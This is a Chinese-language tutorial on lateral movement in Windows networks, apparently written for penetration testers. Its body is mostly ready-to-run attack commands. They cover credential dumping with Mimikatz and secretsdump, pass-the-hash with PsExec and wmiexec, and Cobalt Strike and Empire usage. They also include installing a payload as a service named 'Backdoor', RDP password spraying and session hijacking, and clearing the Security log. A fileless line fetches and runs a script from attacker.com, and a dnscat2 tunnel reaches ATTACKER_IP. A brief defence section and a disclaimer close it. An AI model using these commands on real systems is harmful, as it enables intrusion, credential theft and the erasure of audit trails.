如何使用内网中横向移动的命令行工具

# 如何使用内网中横向移动的命令行工具

## 引言

在企业内网渗透测试或系统维护过程中，横向移动（Lateral Movement）是攻击者或管理员在获取初始立足点后，向网络内部其他系统扩展访问权限的关键技术。熟练掌握命令行工具进行横向移动，不仅能提升渗透测试效率，也能帮助管理员更好地理解防御策略。本文将系统介绍常见的内网横向移动技术及对应的命令行工具使用方法。

---

## 一、横向移动基础概念

### 1.1 什么是横向移动？
横向移动指攻击者在突破边界防御后，利用已控主机作为跳板，通过漏洞利用、凭证窃取或协议滥用等方式，逐步渗透内网其他主机的过程。

### 1.2 常见技术路线
- **凭证利用**：使用获取的密码/哈希进行认证
- **服务漏洞**：利用SMB、RDP等服务的漏洞
- **远程执行**：通过WMI、PsExec等工具执行命令
- **中间人攻击**：LLMNR/NBT-NS欺骗等

---

## 二、核心命令行工具详解

### 2.1 凭证收集工具
#### Mimikatz（Windows）
```powershell
# 提取内存中的明文密码
privilege::debug
sekurlsa::logonpasswords

# 导出Kerberos票据
sekurlsa::tickets /export

SecretsDump（Impacket套件）

# 从DC提取哈希
python3 secretsdump.py DOMN/user:password@DC_IP

# 使用NTLM哈希进行DCSync
python3 secretsdump.py -hashes :NTHASH DOMN/user@DC_IP

2.2 远程执行工具

PsExec

# 使用明文密码连接
psexec \\TARGET_IP -u DOMN\user -p password cmd.exe

# 使用哈希连接（Pass-the-Hash）
psexec -hashes :NTHASH \\TARGET_IP -u user cmd.exe

WMI

# 远程执行命令
wmic /node:TARGET_IP /user:DOMN\user /password:password process call create "cmd.exe /c whoami"

# 哈希传递版本
wmiexec.py -hashes :NTLMHASH DOMN/user@TARGET_IP

2.3 横向移动框架

Cobalt Strike

# 派生会话到已有Beacon
jump psexec64 TARGET_IP DOMN\user password

# 通过SMB Beacon横向移动
link TARGET_IP

Empire

(PowerShell Empire) > usemodule lateral_movement/invoke_psexec
(PowerShell Empire) > set ComputerName TARGET_IP
(PowerShell Empire) > set Listener http
(PowerShell Empire) > execute

---

三、协议级横向移动技术

3.1 SMB协议利用

扫描共享资源

nmap --script smb-enum-shares -p445 TARGET_IP
smbclient -L //TARGET_IP -U user%password

通过SMB上传/执行

# 上传文件
copy payload.exe \\TARGET_IP\C$\Windows\Temp\

# 远程执行
sc \\TARGET_IP create Backdoor binpath= "C:\Windows\Temp\payload.exe"
sc \\TARGET_IP start Backdoor

3.2 RDP横向移动

凭证喷射攻击

crowbar -b rdp -s TARGET_IP/24 -u userlist.txt -p password.txt

RDP劫持（无需密码）

query user  # 获取会话ID
tscon ID /dest:rdp-tcp#0

3.3 WinRM远程管理

# 检查WinRM服务状态
Test-WSMan -ComputerName TARGET_IP

# 远程执行命令
Invoke-Command -ComputerName TARGET_IP -ScriptBlock {whoami} -Credential $cred

---

四、防御规避技巧

4.1 日志清除

# 清除安全日志
wevtutil cl Security

4.2 隐蔽执行

无文件执行

iex (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')

父进程欺骗

# 使用rundll32作为父进程
spawnas.exe 1 "C:\Windows\System32\rundll32.exe" "notepad.exe"

4.3 隧道技术

SSH端口转发

ssh -L 445:TARGET_IP:445 user@JUMPBOX

DNS隐蔽通道

dnscat2 --dns server=ATTACKER_IP --secret=password

---

五、检测与防御建议

5.1 攻击特征检测

• 异常登录模式：同一账户短时间内多主机登录
• 协议异常：SMB/WinRM的暴力破解行为
• 进程链异常：cmd.exe作为Office应用的子进程

5.2 防御措施

1. 最小权限原则：限制本地管理员权限
2. 网络分段：VLAN隔离关键区域
3. 多因素认证：尤其针对RDP等关键服务
4. 日志集中分析：SIEM系统实时监控

---

结语

横向移动是内网渗透的核心环节，攻击者往往组合多种工具和技术实现目标。作为防御方，需深入理解攻击手法，通过纵深防御体系阻断攻击链。本文介绍的工具和技术仅限合法授权测试使用，请严格遵守相关法律法规。

免责声明：本文所述技术仅供安全研究使用，未经授权对他人系统实施测试属于违法行为。 “`

注：实际使用时建议： 1. 补充工具下载链接和安装说明 2. 增加具体案例演示 3. 根据读者水平调整技术细节深度 4. 添加可视化图表（如攻击流程图）